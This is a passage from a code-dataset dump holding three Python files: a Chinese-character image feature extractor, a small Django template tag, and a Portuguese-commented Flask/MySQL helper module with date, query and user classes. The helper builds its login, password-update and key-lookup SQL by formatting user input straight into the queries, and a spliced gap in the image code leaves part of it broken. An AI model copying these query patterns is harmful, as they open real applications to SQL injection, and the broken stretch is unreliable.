"attribute"}, {"api_name": "os.path.join", "line_number": 170, "usage_type": "call"}, {"api_name": "os.path", "line_number": 170, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 171, "usage_type": "call"}, {"api_name": "os.path", "line_number": 171, "usage_type": "attribute"}, {"api_name": "os.sep.join", "line_number": 171, "usage_type": "call"}, {"api_name": "os.sep", "line_number": 171, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 172, "usage_type": "call"}, {"api_name": "os.path", "line_number": 172, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 173, "usage_type": "call"}, {"api_name": "os.path", "line_number": 173, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 176, "usage_type": "call"}, {"api_name": "os.path", "line_number": 176, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 178, "usage_type": "call"}, {"api_name": "os.path", "line_number": 178, "usage_type": "attribute"}, {"api_name": "golem.core.file_manager.create_directory", "line_number": 179, "usage_type": "call"}, {"api_name": "golem.core.file_manager", "line_number": 179, "usage_type": "name"}, {"api_name": "golem.core.utils.separate_file_from_parents", "line_number": 192, "usage_type": "call"}, {"api_name": "golem.core.utils", "line_number": 192, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 193, "usage_type": "call"}, {"api_name": "os.path", "line_number": 193, "usage_type": "attribute"}, {"api_name": "os.sep.join", "line_number": 194, "usage_type": "call"}, {"api_name": "os.sep", "line_number": 194, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 202, "usage_type": "call"}, {"api_name": "os.path", "line_number": 202, "usage_type": "attribute"}]} +{"seq_id": "533323600", "text": "#! 
/usr/bin/python3\n\"\"\"\n/**\n *\n * Date : 29 / 11 / 2017\n *\n * Nom : Li\n * Prenom : Xiang\n *\n * Email : xiangfr007@gmail.com\n *\n * Remarques :\t\n * \t\t\t\n */\n\"\"\"\nfrom PIL import Image\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nfrom numpy import median\nimport sys\n\nall_path = \"../chinese_characters_train\"\ntest_path = \"../chinese_test\"\nresize_wh = 100\ndecalage = 32\nfilter_row_col = 0.2\nfilter_transformation = 40\n\n# return array[resize_wh][resize_wh]\ndef fill_image_to_resize_wh(image):\n\tbase_img = [[255 for col in range(0,resize_wh)] for row in range(0,resize_wh)]\n\tbase_img = np.array(base_img)\n\tfill_img = np.array(image)\n\tfor i in range(0,fill_img.shape[0]):\n\t\tfor j in range(0,fill_img.shape[1]):\n\t\t\tbase_img[i][j] = fill_img[i][j]\n\treturn base_img\n\n# return a photo\n# zoom the photo to (?,resize_wh) or (resize_wh,?)\ndef zoom_image(image):\n\timg_array = np.array(image)\n\tx = img_array.shape[0]\n\ty = img_array.shape[1]\n\tif(x > y):\n\t\trate = resize_wh/x\n\t\ty = int(y*rate)\n\t\treturn image.resize((y,resize_wh))\n\telse:\n\t\trate = resize_wh/y\n\t\tx = int(x*rate)\n\t\treturn image.resize((resize_wh,x))\n\n# return a photo\ndef get_image_of_character(image,average):\n\timg_array = np.array(image)\n\tx = img_array.shape[0]\n\ty = img_array.shape[1]\n\txx = 0;\n\tyy = 0;\n\t#trouver le point noir le plus (haut,gauche) et celui le plus (bas,droite)\n\t#find two black point that locate (up,left) and (bottom,right)\n\tfor i in range(0,img_array.shape[0]):\n\t\tfor j in range(0,img_array.shape[1]):\n\t\t\tif(img_array[i][j] < average):\n\t\t\t\tif(i < x):\n\t\t\t\t\tx = i\n\t\t\t\tif(j < y):\n\t\t\t\t\ty = j\n\t\t\t\tif(i > xx):\n\t\t\t\t\txx = i\n\t\t\t\tif(j > yy):\n\t\t\t\t\tyy = j\n\treturn image.crop((y,x,yy,xx))\n\n#return the average gray of a photo\ndef get_average(image):\n\treturn median(image) - decalage\n\n#return the list[10] (col = False / True)\ndef get_row_col_transformation(image,average,col_flag):\n\timg_array = np.array(image)\n\tlist10 = [ 0 for i in range(10)]\n\tfor i in range(0,img_array.shape[0]):\n\t\tflag = 0\n\t\ttotal = 0\n\t\tfor j in range(0,img_array.shape[1]):\n\t\t\tnow = img_array[i][j]\n\t\t\tif(col_flag == True):\n\t\t\t\tnow = img_array[j][i]\n\t\t\tif(now < average):\n\t\t\t\tif(flag == 0):\n\t\t\t\t\ttotal += 1\n\t\t\t\t\tflag = 1\n\t\t\telse:\n\t\t\t\tif(flag== 1):\n\t\t\t\t\ttotal += 1\n\t\t\t\t\tflag = 0\n\t\tlist10[int(i/10)] += total\n\treturn list10\n\n#return a list[21] and string of ahash\ndef get_feature_image(image):\n\timage = image.convert(\"L\")\t\n\taverage = get_average(image)\n\timage_character = get_image_of_character(image,average)\n\timage_direct_resize = image_character.resize((resize_wh,resize_wh))\n\timage_filled = fill_image_to_resize_wh(zoom_image(image_character))\n\t#list[0] = row / col\n\tlist21 = []\n\tlist21.append(round((float(np.array(image_character).shape[0])/np.array(image_character).shape[1]),2))\n\t#list[1:11] = tranformation of row\n\tfor i in get_row_col_transformation(image_filled,average,False):\n\t\tlist21.append(i)\n\t#list[11:20] = tranformation of col\n\tfor i in get_row_col_transformation(image_filled,average,True):\n\t\tlist21.append(i)\n\t#ahash retrived from: https://www.cnblogs.com/luolizhi/p/5596171.html\n\t#hash_2=''.join(map(lambda i: '0' if idiff_transformation_total):\n\t\t\t\t\tdic_result[train_labels[indice]] = (row_col,diff_transformation_total,diff_hash)\n\t\n\tdic_sorted = sorted(dic_result.items(),key=lambda 
x:x[1][1])\n\t#print(dic_sorted)\n\t#return dic_sorted[0][0]\n\tif(len(dic_sorted) == 0):\n\t\treturn \"404\"\n\tif(len(dic_sorted) == 1):\n\t\treturn dic_sorted[0][0]\n\n\t#and (abs(dic_sorted[0][1][0] - dic_sorted[1][1][0]) < 0.1)\n\tif(dic_sorted[1][1][2] < dic_sorted[0][1][2] and (abs(dic_sorted[0][1][1]-dic_sorted[1][1][1])<10)):\n\t\treturn dic_sorted[1][0]\n\telse:\n\t\treturn dic_sorted[0][0]\n\n", "sub_path": "chinese_src/common.py", "file_name": "common.py", "file_ext": "py", "file_size_in_byte": 5435, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "numpy.array", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 83, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 112, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 154, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 154, "usage_type": "name"}]} +{"seq_id": "192419720", "text": "from django import template\nfrom django.template.loader import select_template\n\nfrom six import with_metaclass\n\nregister = template.Library()\n\n\n@register.simple_tag(takes_context=True)\ndef render_category(context, category):\n\n if not category:\n # Search index is returning products that don't exist in the\n # database...\n return \"\"\n\n names = [\n \"catalogue/category_overview.html\",\n ]\n template_ = select_template(names)\n context = context.flatten()\n\n # Ensure the passed product is in the context as 'product'\n context[\"category\"] = category\n return template_.render(context)\n", "sub_path": "capetown/layout/themes/templatetags/category_page.py", "file_name": "category_page.py", "file_ext": "py", "file_size_in_byte": 628, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django.template.Library", "line_number": 6, "usage_type": "call"}, {"api_name": "django.template", "line_number": 6, "usage_type": "name"}, {"api_name": "django.template.loader.select_template", "line_number": 20, "usage_type": "call"}]} +{"seq_id": "288678498", "text": "# -*- coding: utf8 -*- #\n\n\"\"\"\n\nAutor: Marcos Felipe da Silva Jardim\n\n\"\"\"\nimport pymysql, pymssql, sys, json, re\nfrom pymongo import MongoClient\nimport re, time, os\nfrom flask import session\nfrom datetime import datetime\nfrom datetime import date\nimport config\nfrom PIL import Image, ExifTags\n\n## Classe que gera datas em formato formulario e banco mssql\nclass Data:\n __de = ''\n __ate = ''\n def __init__(self):\n self.__obterData()\n\n def __obterData(self):\n try:\n self.__de = session['de']\n self.__ate = session['ate']\n except KeyError:\n dataAtual = datetime.now()\n self.__de = '%04d-%02d-%02d' % (dataAtual.year, dataAtual.month, dataAtual.day)\n self.__ate = '%04d-%02d-%02d' % (dataAtual.year, dataAtual.month, dataAtual.day)\n\n def getDataForm(self):\n '''Obtem a data no formato tradicional'''\n return [self.__de, self.__ate]\n\n def getData(self):\n '''Obtem a data no formato de acesso ao banco de dados '''\n de = self.__de.replace('-','')\n ate = self.__ate.replace('-','')\n return [de, ate]\n\n def gravaData(self):\n ''' Grava a data atual em um cookie no 
formato das datas de formulario '''\n session['de'] = self.__de\n session['ate'] = self.__ate\n \n def setData(self, de, ate):\n ''' Grava as variaveis de data.'''\n padrao = re.compile('^[2][0][1-9][0-9]-([0][1-9]|[1][0-2])-([3][0-1]|[0][1-9]|[1-2][0-9])$')\n if padrao.match(de) and padrao.match(ate):\n self.__de = de\n self.__ate = ate\n else:\n return 'Data informada de forma incorreta'\n \n ## Funcao que verifica a data\n @staticmethod\n def verifica_data(de, ate):\n padrao = re.compile('^[2][0][1-9][0-9]-([0][1-9]|[1][0-2])-([3][0-1]|[0][1-9]|[1-2][0-9])$')\n if padrao.match(de) and padrao.match(ate):\n return True\n else:\n return False\n\n## Classe usada para trabalhar com consultas do tipo select. Contem muitos metodos uteis como ordenacao de colunas e filtros de campos\nclass Consulta:\n __campos = ''\n __registros = ''\n\n \n def __init__(self, consulta, usuario, senha, banco, servidor, tipo_sgbd='mysql', porta = 1433):\n \"\"\"Retorna um objeto consulta sendo os parametros consulta, usuario , senha, banco, servidor devem ser repassados no momento de criação do objeto. O único parâmetro opcional é o tipo de sgbd que vem como padrão mysql\n\t EX: obj = Consulta('select * from teste', 'root', 'marcos', 'banco_teste', 'localhost', 'mysql')\n \"\"\"\n \n self.__consulta = consulta\n self.__usuario = usuario\n self.__senha = senha\n self.__banco = banco\n self.__servidor = servidor\n self.__tipo_sgbd = tipo_sgbd\n self.__porta = porta\n\t\n self.__conexao()\n\n def __str__(self):\n return 'Consulta(\"%s\", \"%s\", \"%s\", \"%s\", \"%s\", \"%s\")' % \\\n (self.__consulta, self.__usuario, self.__senha, self.__banco, self.__servidor, self.__tipo_sgbd)\n\n def __repr__(self):\n return eval('Consulta(\"%s\", \"%s\", \"%s\", \"%s\", \"%s\", \"%s\")' %\n (self.__consulta, self.__usuario, self.__senha, self.__banco, self.__servidor, self.__tipo_sgbd))\n\n def getCampos(self):\n \"\"\" Retorna todos os campos da tabela \"\"\"\n return self.__campos\n\n def getRegistros(self):\n \"\"\" Retorna todos os registros da consulta \"\"\"\n return self.__registros\n\n def setConsulta(self, consulta):\n \"\"\"\n self.setConsulta('select * from adm_menu')\n \n Executa uma nova consulta no banco e redefine as variaveis de instancia __registros e __campos.\\\n Este metodo foi criado com o intuito de permitir a mudança de dados sem de fato ter de criar outro\n objeto consulta.\n OBS: Somente aceita querys de selecao (select)\n \"\"\"\n\n self.__consulta = consulta\n self.__conexao()\n \n def __conexao(self):\n \"\"\" Realiza de fato a conexão, usando os parametros passados para a conexão \"\"\"\n if self.__tipo_sgbd == 'mysql':\n con = pymysql.connect(user = self.__usuario, password = self.__senha, database = self.__banco, host = self.__servidor, port = self.__porta)\n elif self.__tipo_sgbd == 'mssql':\n con = pymssql.connect(user = self.__usuario, password = self.__senha, database = self.__banco, host = self.__servidor, port = self.__porta)\n else:\n return 'Erro, tipo de SGBD não reconhecido'\n\n # Executar a conexão e a consulta\n cur = con.cursor()\n cur.execute(self.__consulta)\n # Preenchendo os cabecalhos\n self.__campos = [str(campo) for campo, *_ in cur.description]\n # Preenchendo o corpo\n self.__registros = [reg for reg in cur.fetchall()]\n \n # Fechando a conexão com o banco\n con.commit()\n cur.close()\n con.close()\n\n def selecionaCampo(self, nome):\n \"\"\"\n self.selecionaCampo('nome') ou self.selecionaCampo(0) => list()\n \n Seleciona um campo baseado no nome que é informado ou no seu 
numero de coluna. \\\n O nome de fato deve ser real ao nome do campo informado pelo retornno de self.getCampos() \"\"\"\n if nome in self.__campos:\n index = self.__campos.index(nome)\n return [str(item[index]) for item in self.__registros]\n # Se nome for um numero então ele será comparado para verificação de indice de coluna\n elif isinstance(nome, int):\n if nome <= (len(self.__campos)-1):\n index = nome\n return [str(item[index]) for item in self.__registros]\n else:\n return 'O indice de coluna informado não é acessivel na consulta, verifique os campos no atributo _campos ou use um nome de coluna'\n else:\n return 'A coluna informada não foi encontrada, favor verificar o atributo _campos'\n\n def selecionaCampos(self, lista):\n \"\"\"self.selecionaCampos(['nome','senha']) => list()\n Seleciona um ou mais campos informados pelo seu nome. Os nomes devem ser enviados \\\n dentro de uma lista. Se não sabe quais colunas deseja capturar verifique o metodo getCampos().\n Os campos são retornados como uma tupla aninhada dentro de uma lista externa. \"\"\"\n if isinstance(lista, list):\n # Cria um objeto conjunto para unificar os campos\n conjunto = list()\n for item in lista:\n if isinstance(item, str) and item in self.__campos:\n conjunto.append(self.__campos.index(item))\n else:\n return 'Favor enviar somente nomes de colunas que existam em self.__campos'\n\n reg = []\n for item in self.__registros:\n listas = []\n for campo in conjunto:\n listas.append(item[campo])\n reg.append(tuple(listas))\n return reg\n else:\n return 'Por favor informe uma lista para os campos que se deseja retornar'\n \n def ordenaColuna(self, coluna, decrescente=True):\n \"\"\"Ordena a coluna informada na ordem desejada(ordena os registros) e devolve uma copia para o\n usuario. A coluna deve existir em __campos (verificar com o metodo getCampos()).\n self.ordenaColuna('id_usuarios', False)\n \"\"\"\n # Se a coluna não existe em self.__campos nem continuo\n if coluna not in self.__campos:\n return 'Campo nao existe'\n \n # Salva os valores originais em variaveis usadas para devolver tudo ao estado original\n campo_original = self.__campos[:]\n registro_original = self.__registros[:]\n # Faz uma copia para uma lista onde vai estar os campos alterados. Na verdade ela é somente temporaria\n campo_alterado = self.__campos[:]\n # Remove o campo a ser ordenado da lista copiada. 
Isto para trazer ele em um novo array como primeiro campo \n campos_ordenados = [campo_alterado.pop(self.__campos.index(coluna))]\n desc = [ campos_ordenados.append(item) for item in campo_alterado ]\n # Exclui a variavel temporaria desc e campo_alterado (reducao de consumo de memoria)\n del desc\n del campo_alterado\n ## Recupera os registros desejados com a coluna a ser ordenada em primeiro lugar\n registros_ordenados = self.selecionaCampos(campos_ordenados)\n ## Ordena de fato os registros baseado no valor de decrescente, True ou false\n registros_ordenados = sorted(registros_ordenados, reverse=decrescente)\n\n ## Insere a ordem dos novos registros em self.__registros e self.__campos armazena a ordem dos campos\n # Isto é importante porque vamos devolver os campos originais ao usuario, ou seja as colunas originais na ordem da coluna\n # informada.\n self.__registros = registros_ordenados\n self.__campos = campos_ordenados\n ## Pede para receber o retorno da ordem das colunas originais com os registros ordenados da forma desejada antes.\n \n registros_ordenados = self.selecionaCampos(campo_original)\n # Volta os valores __campos e __registros para o original\n self.__campos = campo_original\n self.__registros = registro_original\n # Devolve os registros em ordem de coluna original com a coluna desejada ditando a ordem principal\n return registros_ordenados\n\n def procuraDados(self, dado):\n \"\"\" Retorna True se o dado a ser procurado existe em self.getRegistros(), caso contrario retorna False\"\"\"\n for reg in self.getRegistros():\n for item in reg:\n if dado == item:\n return True\n return False\n\n def __len__(self):\n return len(self.getRegistros())\n \n @staticmethod\n def executarConsulta(consulta, usuario, senha, banco, servidor, tipo_sgbd='mysql', porta = 1433):\n \n ''' Realiza de fato a conexão, usando os parametros passados para a conexão '''\n if tipo_sgbd == 'mysql':\n con = pymysql.connect(user = usuario, password = senha, database = banco, host = servidor)\n elif tipo_sgbd == 'mssql':\n con = pymssql.connect(user = usuario, password = senha, database = banco, host = servidor, port = porta)\n else:\n return 'Erro, tipo de SGBD não reconhecido'\n # Executar a conexão e a consulta\n cur = con.cursor()\n cur.execute(consulta)\n con.commit()\n cur.close()\n con.close()\n @staticmethod\n def obter_db_mongo(banco = None):\n ''' Retorna o banco de daddos do mongodb informado pelos parametros de acesso em config.py'''\n c = MongoClient('mongodb://%s:%s@%s' % (config.mongo_acesso['usuario'], \n config.mongo_acesso['senha'], \n config.mongo_acesso['servidor']))\n return c[config.mongo_acesso['banco'] if banco is None else banco]\n\n \n## CLASSE DO USUARIO. ARMAZENA COOKIES, RETORNA-OS, EXIBE SEU NOME, RETORNA ACESSOS ETC...\nclass Usuario(Consulta, Data):\n __id = 0\n __nome = ''\n __email = ''\n __menus = list()\n\t\n def __init__(self, usuario = '', senha = '', chave = None):\n ''' Retorna um objeto usuario recebendo como parametro inicial o ID do usuario '''\n self.__dadosUsuario(usuario, senha, chave)\n Data.__init__(self) \n \n def getLojas(self, com_id = False):\n ''' Retorna todas as lojas que o usuario tem acesso. 
'''\n if com_id == True:\n sql = \"\"\"select af.id_filial, af.filial from adm_filial af \n INNER JOIN adm_usuario_filial auf ON af.id_filial = auf.id_filial \n INNER JOIN adm_usuario au ON au.id_usuario = auf.id_usuario \n WHERE auf.id_usuario = %d\"\"\" % self.getID()\n else:\n sql = \"\"\"select af.filial from adm_filial af \n INNER JOIN adm_usuario_filial auf ON af.id_filial = auf.id_filial \n INNER JOIN adm_usuario au ON au.id_usuario = auf.id_usuario \n WHERE auf.id_usuario = %d\"\"\" % self.getID()\n con = pymysql.connect(user = my_usuario, password = my_senha, database = my_banco, host = my_servidor)\n cur = con.cursor()\n cur.execute(sql)\n if com_id == True:\n lojas = [ loja for loja in cur.fetchall()]\n else:\n lojas = [ ('%s') % loja for loja in cur.fetchall()]\n cur.close()\n con.close()\n return lojas\n\n def getGrupos(self, com_id = False):\n '''Retorna todos os grupos que o usuario tem acesso. Os grupos são retornados em uma matriz '''\n if com_id == True:\n sql = \"\"\"select ag.id_grupo, ag.grupo from adm_grupo ag \n INNER JOIN adm_usuario_grupo aug ON ag.id_grupo = aug.id_grupo \n INNER JOIN adm_usuario au ON au.id_usuario = aug.id_usuario \n WHERE aug.id_usuario = %d \"\"\" % self.getID()\n else:\n sql = \"\"\"select ag.grupo from adm_grupo ag \n INNER JOIN adm_usuario_grupo aug ON ag.id_grupo = aug.id_grupo \n INNER JOIN adm_usuario au ON au.id_usuario = aug.id_usuario \n WHERE aug.id_usuario = %d \"\"\" % self.getID()\n con = pymysql.connect(user = my_usuario, password = my_senha, database = my_banco, host = my_servidor)\n cur = con.cursor()\n cur.execute(sql)\n if com_id == True:\n grupos = [ grupo for grupo in cur.fetchall()]\n else:\n grupos = [ ('%s') % grupo for grupo in cur.fetchall()]\n cur.close()\n con.close()\n\t \n return grupos\n\n @staticmethod\n def getTodosGrupos(com_id = False):\n '''Retorna todos os grupos do sistema '''\n if com_id == True:\n sql = \"\"\"select ag.id_grupo, ag.grupo from adm_grupo ag \"\"\"\n else:\n sql = \"\"\"select ag.grupo from adm_grupo ag \"\"\"\n con = pymysql.connect(user = my_usuario, password = my_senha, database = my_banco, host = my_servidor)\n cur = con.cursor()\n cur.execute(sql)\n if com_id == True:\n grupos = [ grupo for grupo in cur.fetchall()]\n else:\n grupos = [ ('%s') % grupo for grupo in cur.fetchall()]\n cur.close()\n con.close()\n\t \n return grupos\n\n\n def getID(self):\n \"\"\" Retorna o ID do usuario.\"\"\"\n return self.__id\n \n def getNome(self):\n \"\"\" Retorna o nome do usuario.\"\"\"\n return self.__nome\n\n def getMenuAdm(self):\n \"\"\" Retorna um dicionario com os menus já agrupados\"\"\"\n dados = {}\n for reg in self.__menus:\n chave, valor, nome = reg\n if chave in sorted(dados.keys()):\n dados[chave].append(valor)\n else:\n dados[chave] = [valor]\n return dados\n \n def __dadosUsuario(self, usuario, senha, chave = None):\n \"\"\" Verifica se usuario e senha estao em branco, então ver se tem cookies. Se tiver preencher variaveis. 
\"\"\"\n sqlMenu = \"\"\"SELECT am.familia, am.link, am.nome FROM adm_usuario au INNER JOIN adm_usuario_menu aum \n ON au.id_usuario = aum.id_usuario INNER JOIN adm_menu am ON aum.id_menu = am.id_menu \n WHERE aum.id_usuario = %d ORDER BY am.familia, am.nome\"\"\"\n \n if usuario == '' and senha == '' and chave is None :\n try:\n self.__id = int(session['id'])\n self.__nome = session['nome']\n self.__email = session['email']\n except KeyError:\n self.__id = 0\n sql = 'select * from adm_usuario where id_usuario = %d' % self.__id\n Consulta.__init__(self, sql, my_usuario, my_senha, my_banco, my_servidor, 'mysql', porta = my_porta)\n\n elif not chave is None:\n \n # TENTA FAZER O LOGIN BASEADO NA CHAVE ENVIADA\n SQL = \"SELECT id_usuario, nome, email FROM adm_usuario WHERE uid = '%s' \" % chave\n # Executando e criando um objeto consulta\n Consulta.__init__(self, SQL, my_usuario, my_senha, my_banco, my_servidor, 'mysql', porta = my_porta)\n \n dados = self.getRegistros()\n for reg in dados:\n self.__id, self.__nome, self.__email = reg\n\n else:\n # Consulta para verificar se usuario e senha estão corretos e seus menus\n sql = \"SELECT id_usuario, nome, email FROM adm_usuario WHERE nome = '%s' AND senha = SHA('%s')\" % (usuario, senha)\n \n # Executando e criando um objeto consulta\n Consulta.__init__(self, sql, my_usuario, my_senha, my_banco, my_servidor, 'mysql', porta = my_porta)\n \n dados = self.getRegistros()\n for reg in dados:\n self.__id, self.__nome, self.__email = reg\n # Executando e criando um objeto consulta\n\t\t\n self.setConsulta(sqlMenu % self.__id)\n\n self.__menus = self.getRegistros()\n \n def atualizaSenha(self, senhaAntiga, novaSenha):\n \"\"\" Recebe a senha antiga e a senha nova do usuario, baseado nisto tenta alterar a senha conectando com e atualizando a nova.\"\"\"\n # Consulta para verificar a senha antiga\n sqlSenha = \"SELECT senha FROM adm_usuario WHERE id_usuario = %d AND senha = SHA('%s') \" % (self.__id, senhaAntiga)\n self.setConsulta(sqlSenha)\n\n dados = self.getRegistros()\n if len(dados) == 1:\n # Senha correta, vamos atualiza-la\n sqlAtualizaSenha = \"UPDATE adm_usuario SET senha = SHA('%s') WHERE id_usuario = %d\" % (novaSenha, self.__id)\n Consulta.executarConsulta(sqlAtualizaSenha, my_usuario, my_senha, my_banco, my_servidor, porta = my_porta)\n return 'Senha Atualizada'\n else:\n return 'Erro com a senha enviada. 
Senha incorreta'\n\n def gravaGrupos(self, grupos):\n ''' Grava os grupos em um cookie para ser usado nas proximas consultas.'''\n session['grupo_selecionado'] = grupos\n\n def gravaTipos(self, tipos):\n ''' Grava os tipos AR e/ou OC escolhidos na validacao dos relatorios por grife e referencia '''\n session['tipo_ar_oc'] = tipos\n \n def gravaGrupoTemporario(self, grupos):\n ''' Grava os grupos temporarios usados nos relatorios de grife e referencia '''\n session['grupo_temporario'] = grupos\n \n def gravaLojas(self, lojas):\n ''' Grava as lojas que foram enviadas na consulta'''\n session['loja_selecionada'] = lojas\n \n def gravaVisita(self, tabela):\n ''' Grava a visita do usuario na tabela da pagina, assim como a data/hora(Implementada via MySQL)'''\n SQL = \"INSERT INTO analise_acesso VALUES(0, '%s', '%s', NOW())\" % (self.getNome(), tabela)\n Consulta.executarConsulta(SQL, my_usuario, my_senha, my_banco, my_servidor, 'mysql', porta = my_porta)\n\n def verificaMenu(self, menu):\n ''' Verifica o menu do usuario se o mesmo tiver este menu retorna True senao retorna False'''\n for _, m, n in self.__menus:\n\n if m.find(menu) != -1:\n return True\n else:\n continue\n return False\n\n def gravaTipoGrupoGrife(self, grupo_grife):\n ''' Grava os tipos grupo grife (AHIC, TCHA) '''\n session['tipo_grupo_grife'] = grupo_grife\n\n def getDivulgadorGrupo(self, id_grupo, id_filial):\n ''' Retorna o ID e nome do divulgador dependendo do id_grupo e id_filial repassado'''\n SQL = \"SELECT d.id_divulgador, d.nome FROM divulgador d INNER JOIN adm_grupo_filial_divulgador agfd ON agfd.id_divulgador = d.id_divulgador \\\n INNER JOIN adm_grupo ag ON ag.id_grupo = agfd.id_grupo INNER JOIN adm_filial af ON af.id_filial = agfd.id_filial \\\n WHERE agfd.id_grupo = %d AND agfd.id_filial = %d AND d.D_E_L_E_T_ IS NULL\" % (int(id_grupo), int(id_filial))\n c = Consulta(SQL, my_usuario, my_senha, my_banco, my_servidor, 'mysql', porta = my_porta)\n return c.getRegistros()\n\n def getDivulgador(self):\n '''Retorna todos os divulgadores cadastrados no sistema até o momento '''\n SQL = \"SELECT id_divulgador, nome FROM divulgador WHERE D_E_L_E_T_ IS NULL \"\n c = Consulta(SQL, my_usuario, my_senha, my_banco, my_servidor, 'mysql', porta = my_porta)\n return c.getRegistros()\n \n def getQuantidadeVendedores(self, grupo, mes, ano):\n ''' Este metodo do usuario recupera a quantidade de vendeores na loja retornando um\n dicionario com a quantidade de vendedores'''\n meta = {'01':['JAN'],'02':['FEV'],'03':['MAR'],'04':['ABR'],'05':['MAI'],\n '06':['JUN'],'07':['JUL'],'08':['AGO'],'09':['SET'],\n '10':['OUT'],'11':['NOVE'],'12':['DEZE']}\n SQL = \"\"\"SELECT gf.nome AS LOJA, mi.qt_vendedor AS VENDEDOR FROM adm_grupo_fil gf \n INNER JOIN adm_grupo_fil_ano_mes_meta_info gfammi ON gf.id_grupo_fil = gfammi.id_grupo_fil\n INNER JOIN adm_ano a ON a.id_ano = gfammi.id_ano \n INNER JOIN adm_mes m ON m.id_mes = gfammi.id_mes\n INNER JOIN adm_meta_info mi ON mi.id_meta_info = gfammi.id_meta_info \n WHERE gf.nome IN(%s) AND m.mes = '%s' AND a.ano = '%s' \n GROUP BY gf.nome, mi.qt_vendedor \"\"\" % (grupo, meta[mes][0], ano)\n c = Consulta(SQL, my_usuario, my_senha, my_banco, my_servidor, 'mysql', porta = my_porta)\n return {reg[0]:reg[1] for reg in c.getRegistros()}\n\n def registraVisita(self, menu):\n ''' Recebe uma string representando o menu e então computa a visita do usuario '''\n SQL = \"SELECT id_menu FROM adm_menu where link LIKE '%\"+menu+\"%'\"\n c = Consulta(SQL, my_usuario, my_senha, my_banco, my_servidor, tipo_sgbd = 
'mysql', porta = my_porta)\n qt_acesso = c.getRegistros()[0][0]\n SQL = \"\"\"INSERT INTO adm_usuario_menu_num_acesso (id_usuario, id_menu, num_acesso) \n SELECT %d, %d, 0 FROM DUAL WHERE NOT EXISTS \n (SELECT id_usuario, id_menu, num_acesso FROM adm_usuario_menu_num_acesso \n WHERE id_usuario = %d AND id_menu = %d )\"\"\" % (self.getID(), qt_acesso, self.getID(), qt_acesso)\n Consulta.executarConsulta(SQL, my_usuario, my_senha, my_banco, my_servidor, tipo_sgbd = 'mysql', porta = my_porta)\n ## Ultima query para fazer o update do campo num_acesso\n SQL = \"UPDATE adm_usuario_menu_num_acesso SET num_acesso = num_acesso + 1 WHERE id_usuario = %d AND id_menu = %d \" % (self.getID(), qt_acesso)\n Consulta.executarConsulta(SQL, my_usuario, my_senha, my_banco, my_servidor, tipo_sgbd = 'mysql', porta = my_porta)\n ## QUERY PARA REGISTRAR DATA/HORA DE ACESSO\n SQL = \"INSERT INTO adm_usuario_menu_data_acesso (id_usuario, id_menu) VALUES(%d, %d)\" % (self.getID(), qt_acesso)\n Consulta.executarConsulta(SQL, my_usuario, my_senha, my_banco, my_servidor, tipo_sgbd = 'mysql', porta = my_porta)\n\n def retornaMenuUsuario(self):\n ''' Retorna o primeiro menu do usuario para que do lado do controlador ele seja redirecionado'''\n menu_interno = self.__menus[0][1]\n inicio = menu_interno.find('href=') + len('href=') + 1\n fim = menu_interno[inicio:].find('>') - 1\n m = menu_interno[inicio:inicio+fim]\n return m\n\n def getGrupoFilial(self):\n ''' Retorna o grupo e filial selecionado '''\n grupo_filial = [\"'%02d%02d'\" % (int(num), int(lj)) for num in str(session['grupo_selecionado']).split(',')\n for lj in str(session['loja_selecionada']).split(',')]\n return ','.join(grupo_filial)\n \n def getGrupoSelecionado(self, nome = False):\n ''' Retorna uma lista do grupo selecionado '''\n if nome:\n numeros = [str(num) for num in str(session['grupo_selecionado']).split(',')]\n grpID = ','.join(numeros)\n SQL = \"SELECT id_grupo, nome FROM adm_grupo WHERE id_grupo IN(%s)\" % (grpID)\n c = Consulta(SQL, my_usuario, my_senha, my_banco, my_servidor, tipo_sgbd = 'mysql', porta = my_porta)\n return {idGrupo:nome.split('-')[1].strip() for idGrupo, nome in c.getRegistros()}\n else:\n return [int(num) for num in str(session['grupo_selecionado']).split(',')]\n\n def getFilialSelecionado(self):\n '''Retorna a filial selecionada '''\n return str(session['loja_selecionada']).split(',')\n\n def getTipoArOc(self):\n ''' Retorna o tipo ar/oc ou ambos selecionado'''\n return [ tipo for tipo in str(session['tipo_ar_oc']).split(',')]\n\n def getGrife(self):\n ''' Retorna a grife selecionada '''\n return [ grife for grife in str(session['tipo_grupo_grife']).split(',') ]\n\n def getGruposTodos(self):\n ''' Retorna todos os grupos do sistema '''\n SQL = \"SELECT id_grupo, grupo FROM adm_grupo\"\n c = Consulta(SQL, my_usuario, my_senha, my_banco, my_servidor, tipo_sgbd = 'mysql', porta = my_porta)\n return {idGrupo:nome for idGrupo, nome in c.getRegistros()}\n\n def getGrupoTemporarioSelecionado(self, nome = False):\n ''' Retorna todos os grupos temporarios '''\n if nome:\n numeros = [str(num) for num in str(session['grupo_temporario']).split(',')]\n grpID = ','.join(numeros)\n SQL = \"SELECT id_grupo, nome FROM adm_grupo WHERE id_grupo IN(%s)\" % (grpID)\n c = Consulta(SQL, my_usuario, my_senha, my_banco, my_servidor, tipo_sgbd = 'mysql', porta = my_porta)\n return {idGrupo:nome.split('-')[1].strip() for idGrupo, nome in c.getRegistros()}\n else:\n return [int(num) for num in str(session['grupo_temporario']).split(',')]\n\n def 
